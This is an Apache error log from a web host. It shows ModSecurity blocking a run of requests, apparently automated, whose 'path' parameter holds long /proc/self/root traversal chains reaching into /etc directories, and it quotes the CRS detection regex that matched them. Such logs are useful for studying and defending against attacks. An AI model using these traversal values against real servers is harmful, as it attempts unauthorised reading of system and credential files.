[Fri Mar 20 07:48:15.439459 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.243.128:50000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l7_HIg5MgXLBnicP2KwAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:16.731395 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:50006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l8BCii7xarUs8iHZl6AAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:18.041928 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.243.128:50022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l8jJ3M9BSuKP7CAYZMwAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:19.377521 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.243.128:50038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l8_qxLDW4GITHUkTlBgAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:21.288427 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.243.128:49258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l9DJ3M9BSuKP7CAYZOQAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:23.760690 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:49272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l9jJ3M9BSuKP7CAYZQQAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:24.157131 2026] [mime_magic:error] [pid 9818:tid 140411716749056] (70014)End of file found: [client 57.141.18.33:48448] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:48:25.482925 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:49282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l-TJ3M9BSuKP7CAYZSwAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:26.808371 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:49284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l-uoXxyEfFpUF8f9_oAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:28.316341 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:49298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l_OoXxyEfFpUF8f9_ogAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:30.177436 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:57368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l_vXLqtnMIWvjpaKYuwAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:31.439185 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:57374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l__qxLDW4GITHUkTlDgAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:32.707771 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:57378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mANa6ubjKNq_cu4bSXQAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:33.957155 2026] [mime_magic:error] [pid 31215:tid 140411691570944] (70014)End of file found: [client 74.7.241.31:59036] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/systemd/user
[Fri Mar 20 07:48:34.031476 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.243.128:57388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mAvXLqtnMIWvjpaKYwQAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:36.071347 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:57398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mBBCii7xarUs8iHZl7QAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:37.423197 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:57410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mBQF0L0L-SsrnPo5nhAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:38.712632 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.243.128:57414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mBvqxLDW4GITHUkTlGQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:40.016457 2026] [:error] [pid 11167:tid 140411716749056] [client 74.7.243.128:58602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mCPHIg5MgXLBnicP2MgAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:41.414179 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.243.128:58616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mCQF0L0L-SsrnPo5niAAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:42.744502 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:58632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mCuoXxyEfFpUF8f9_sgAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:44.042957 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.243.128:58634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mDF1pVZ5mVmJwsFMuhAAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:45.383868 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:58642] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mDRCii7xarUs8iHZl9AAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
